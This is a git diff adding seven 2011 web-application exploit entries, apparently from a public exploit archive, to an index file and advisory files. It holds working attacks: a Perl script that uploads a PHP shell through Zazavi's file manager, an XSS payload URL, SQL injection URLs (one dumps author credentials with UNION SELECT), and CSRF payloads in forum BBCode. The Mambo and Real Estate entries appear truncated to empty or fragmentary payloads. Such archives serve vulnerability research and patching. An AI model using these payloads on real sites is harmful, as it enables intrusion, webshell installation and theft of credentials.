diff --git a/files.csv b/files.csv
index ea994db89..8785d7c36 100755
--- a/files.csv
+++ b/files.csv
@@ -32514,3 +32514,10 @@ id,file,description,date,author,platform,type,port
36075,platforms/windows/remote/36075.py,"Freefloat FTP Server 'ALLO' Command Remote Buffer Overflow Vulnerability",2011-08-20,Black.Spook,windows,remote,0
36076,platforms/php/webapps/36076.txt,"Concrete 5.4.1 1 'rcID' Parameter Cross Site Scripting Vulnerability",2011-08-22,"Aung Khant",php,webapps,0
36077,platforms/php/webapps/36077.txt,"Open Classifieds 1.7.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-23,"Yassin Aboukir",php,webapps,0
+36079,platforms/php/webapps/36079.txt,"CommodityRentals Real Estate Script 'txtsearch' Parameter HTML Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
+36080,platforms/php/webapps/36080.txt,"Tourismscripts Hotel Portal 'hotel_city' Parameter HTML Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
+36081,platforms/php/webapps/36081.txt,"VicBlog 'tag' Parameter SQL Injection Vulnerability",2011-08-24,"Eyup CELIK",php,webapps,0
+36082,platforms/php/webapps/36082.pl,"Zazavi 1.2.1 'filemanager/controller.php' Arbitrary File Upload Vulnerability",2011-08-25,KedAns-Dz,php,webapps,0
+36083,platforms/php/webapps/36083.txt,"Simple Machines Forum 1.1.14/2.0 '[img]' BBCode Tag Cross Site Request Forgery Vulnerability",2011-08-25,"Christian Yerena",php,webapps,0
+36084,platforms/php/webapps/36084.html,"Mambo CMS 4.6.5 'index.php' Cross-Site Request Forgery Vulnerability",2011-08-26,Caddy-Dz,php,webapps,0
+36085,platforms/php/webapps/36085.txt,"phpWebSite <= 1.7.1 'mod.php' SQL Injection Vulnerability",2011-08-27,Ehsan_Hp200,php,webapps,0
diff --git a/platforms/php/webapps/36079.txt b/platforms/php/webapps/36079.txt
new file mode 100755
index 000000000..3b1126625
--- /dev/null
+++ b/platforms/php/webapps/36079.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49296/info
+
+Real Estate Script is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+"/>
\ No newline at end of file
diff --git a/platforms/php/webapps/36080.txt b/platforms/php/webapps/36080.txt
new file mode 100755
index 000000000..a5f1a2f00
--- /dev/null
+++ b/platforms/php/webapps/36080.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49297/info
+
+Hotel Portal is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
+
+http://www.example.com/city.php?hotel_city=%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E&dayfrom=23&monthfrom=8&yearfrom=2011&dayback=24&monthback=8&yearback=2011&guest=1&rooms=1&hotel_stars=&pricefrom=0&pricetill=250&B1=Search
\ No newline at end of file
diff --git a/platforms/php/webapps/36081.txt b/platforms/php/webapps/36081.txt
new file mode 100755
index 000000000..6b23ebb26
--- /dev/null
+++ b/platforms/php/webapps/36081.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49304/info
+
+VicBlog is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/vicblog/index.php?page=posts&tag=1%27
\ No newline at end of file
diff --git a/platforms/php/webapps/36082.pl b/platforms/php/webapps/36082.pl
new file mode 100755
index 000000000..f8bc5cbc1
--- /dev/null
+++ b/platforms/php/webapps/36082.pl
@@ -0,0 +1,44 @@
+source: http://www.securityfocus.com/bid/49309/info
+
+Zazavi is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
+
+Zazavi 1.2.1 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/perl
+system ("title KedAns-Dz");
+system ("color 1e");
+system ("cls");
+use strict;
+use warnings;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+print <> Provided By KedAns-Dz << |
+|= e-mail : ked-h[at]hotmail.com |
+|==========================================|
+INTRO
+print "\n";
+print "[*] Enter URL(f.e: http://target.com): ";
+ chomp(my $url=);
+print "\n";
+print "[*] Enter File Path (f.e: C:\\Shell.php.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php.gif)
+ chomp(my $file=);
+my $ua = LWP::UserAgent->new;
+my $re = $ua->request(POST $url.'/admin/editor/filemanager/controller.php',
+ Content_Type => 'multipart/form-data',
+ Content =>
+ [
+ action => 'uploadFile',
+ newfile => 'DzOffendersCr3w.php',
+ filepath => $file,
+ ] );
+print "\n";
+if($re->is_success) {
+ if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
+ else { print "[-] File Upload Is Disabled! Failed!\n"; }
+} else { print "[-] HTTP request Failed!\n"; }
+exit;
\ No newline at end of file
diff --git a/platforms/php/webapps/36083.txt b/platforms/php/webapps/36083.txt
new file mode 100755
index 000000000..1954aa396
--- /dev/null
+++ b/platforms/php/webapps/36083.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/49311/info
+
+Simple Machines Forum is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
+
+Simple Machines Forum 2.0 and 1.1.14 are vulnerable; other versions may be affected.
+
+[img]http://www.example.com/index.php?sa=editBuddies;remove=102;action%00=profile[/img]
+
+[img]http://www.example.com/community/index.php?action%00=logout;token[/img]
\ No newline at end of file
diff --git a/platforms/php/webapps/36084.html b/platforms/php/webapps/36084.html
new file mode 100755
index 000000000..25c5b6ff8
--- /dev/null
+++ b/platforms/php/webapps/36084.html
@@ -0,0 +1,44 @@
+source: http://www.securityfocus.com/bid/49315/info
+
+Mambo CMS is prone to a cross-site request-forgery vulnerability.
+
+Attackers can exploit this issue by tricking an unsuspecting user into visiting a malicious Web page. The page will consist of specially crafted script code designed to perform some action on the attacker's behalf.
+
+Successful exploits will allow attackers to run privileged commands on the affected device.
+
+Mambo CMS 4.6.5 is vulnerable; other versions may also be affected.
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/36085.txt b/platforms/php/webapps/36085.txt
new file mode 100755
index 000000000..a7ede3bc5
--- /dev/null
+++ b/platforms/php/webapps/36085.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/49354/info
+
+phpWebSite is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/mod.php?mod=publisher&op=allmedia&artid=-1 union select concat(aid,0x3a,pwd) from authors
\ No newline at end of file